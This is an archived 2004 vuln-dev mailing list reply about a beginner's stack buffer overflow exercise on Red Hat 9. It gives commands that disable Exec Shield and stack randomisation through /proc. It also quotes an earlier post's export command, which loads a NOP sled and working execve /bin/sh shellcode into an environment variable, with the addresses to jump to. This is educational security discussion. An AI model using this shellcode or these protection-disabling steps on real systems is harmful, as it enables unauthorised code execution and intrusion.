Re: Buffer Overflow Help

From: runixd (runixd_at_nullcode.net)
Date: 11/10/04

  • Next message: Carlos Carvalho: "RE: Buffer Overflow Help"
    To: vuln-dev@securityfocus.com
    Date: Wed, 10 Nov 2004 16:08:43 +0000
    
    

    On Wed, 2004-11-10 at 12:01 +0200, Harry de Grote wrote:
    > Op Tuesday 09 November 2004 04:09, eip@tampabay.rr.com sgreifde:
    > <snip>
    > > I am running GCC version 3.2.2 20030222 (Red Hat Linux 3.2.2-5) on a Redhat
    > > 9 box kernel 2.4.20-31.9. Am I doing something wrong?
    >
    > no, you don't
    >
    > but... RH does randomize the stack a little iirc

    > so, my way of doing stuff then, is just brute force it! :)
    > (you could also return tu libc or whatever)

    How would returning to libc help with randomized stack?

    Brute forcing should help, but while learning its probably better to run
    vanilla kernel or disable Exec Shield. Depending on your version,
    options may very, but you should be able to disable stack randomization
    by setting
    /proc/sys/kernel/exec-shield-randomize to 0
    "echo 0 > /proc/sys/kernel/exec-shield-randomize"

    and you can disable exec shield in /proc/sys/kernel/exec-shield, setting
    it to 0, should cause it to be disabled, otherwise this is where you
    have to work with non executable stack and return to libc.

    You can start reading about Exec Shield at
    http://people.redhat.com/mingo/exec-shield/ANNOUNCE-exec-shield

    > best way to do it (i think) is : put your shellcode in the env...
    >
    > export SHELLCODE=`perl -e '{print "\x90"x65000 .
    > "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`
    >
    > that should give you some breathing space for where to jump to...
    >
    > shellcode starts (on my box at 0xbfff0027, so everything from there to
    > 0xbffffe00 sould do fine...

    regards


  • Next message: Carlos Carvalho: "RE: Buffer Overflow Help"

    Relevant Pages

    • Re: [GIT PULL] s390 updates for 2.6.28-rc1
      ... (i have still no objections to those small x86 bits.) ... binary is - whether to randomize the vdso, ... it's just a historic/quirky connection (non-executable stack was the ... first and biggest step towards a more flexible address space layout) - ...
      (Linux-Kernel)
    • Re: [GIT PULL] s390 updates for 2.6.28-rc1
      ... (i have still no objections to those small x86 bits.) ... binary is - whether to randomize the vdso, ... it's just a historic/quirky connection (non-executable stack was the ... first and biggest step towards a more flexible address space layout) - ...
      (Linux-Kernel)
    • Re: Buffer Overflow Help
      ... RH does randomize the stack a little iirc ... so, my way of doing stuff then, is just brute force it! ...
      (Vuln-Dev)
    • Re: why does exec-shield load .so @ diff addrs run to run
      ... Shaun Clowes wrote: ... >> certainly doesn't randomize the location of executable ... Only the stack appears to be randomized. ... /* Would you like fries with that? ...
      (comp.os.linux.development.system)
    • Re: Allocating stack storage on Solaris?
      ... libc could gain that knowledge, ... the risk of failure minimal but still real. ... You have the same risk of failure if your stack size is too small. ...
      (comp.unix.solaris)